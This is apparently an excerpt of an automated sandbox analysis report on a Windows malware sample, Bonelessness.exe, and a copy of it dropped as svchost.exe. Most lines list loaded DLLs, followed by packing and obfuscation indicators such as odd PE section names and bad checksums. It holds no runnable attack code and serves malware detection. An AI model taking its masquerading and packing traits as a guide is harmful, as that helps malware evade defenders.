      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: winscard.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: sensapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dbgcore.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: winscard.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: devobj.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: sensapi.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: iphlpapi.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dbghelp.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dbgcore.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: netapi32.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: samcli.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: netutils.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dnsapi.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: wininet.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: windows.storage.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: wldp.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: sspicli.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: iertutil.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: profapi.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: winscard.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: devobj.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: sensapi.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: iphlpapi.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dbghelp.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dbgcore.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: netapi32.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: samcli.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: netutils.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dnsapi.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: wininet.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: windows.storage.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: wldp.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: sspicli.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: iertutil.dll
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: profapi.dll
      Source: C:\Users\user\Desktop\Bonelessness.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32Jump to behavior
      Source: Bonelessness.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JbrLYfXaOpqnSngA.exe, 00000005.00000000.2010181534.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000006.00000002.2204828700.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000000.2011823970.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2205428505.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2045473414.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000000.2033627529.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000000.2049314885.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000017.00000000.2052075922.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000019.00000000.2055014446.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000001B.00000000.2059375961.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000001D.00000000.2060402527.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000001F.00000000.2072104638.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000021.00000002.2079267989.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000023.00000000.2077051462.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000025.00000000.2081215028.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089000932.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\Bonelessness.exeUnpacked PE file: 0.2.Bonelessness.exe.400000.1.unpack .ZYkKE:R;.peSRE:ER;.ig:R;.data:W;.LI:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
      Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 1.2.svchost.exe.400000.1.unpack .ZYkKE:R;.peSRE:ER;.ig:R;.data:W;.LI:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeUnpacked PE file: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.unpack
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeUnpacked PE file: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeUnpacked PE file: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeUnpacked PE file: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.unpack
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeUnpacked PE file: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.unpack
      Source: C:\Users\user\Desktop\Bonelessness.exeUnpacked PE file: 0.2.Bonelessness.exe.400000.1.unpack
      Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 1.2.svchost.exe.400000.1.unpack
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004020C0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020C0
      Source: initial sampleStatic PE information: section where entry point is pointing to: .peSRE
      Source: svchost.exe.0.drStatic PE information: real checksum: 0x5da12987 should be: 0x3bfb4
      Source: Bonelessness.exeStatic PE information: real checksum: 0x325ee3da should be: 0x3bfb4
      Source: Bonelessness.exeStatic PE information: section name: .ZYkKE
      Source: Bonelessness.exeStatic PE information: section name: .peSRE
      Source: Bonelessness.exeStatic PE information: section name: .ig
      Source: Bonelessness.exeStatic PE information: section name: .LI
      Source: svchost.exe.0.drStatic PE information: section name: .ZYkKE
      Source: svchost.exe.0.drStatic PE information: section name: .peSRE
      Source: svchost.exe.0.drStatic PE information: section name: .ig
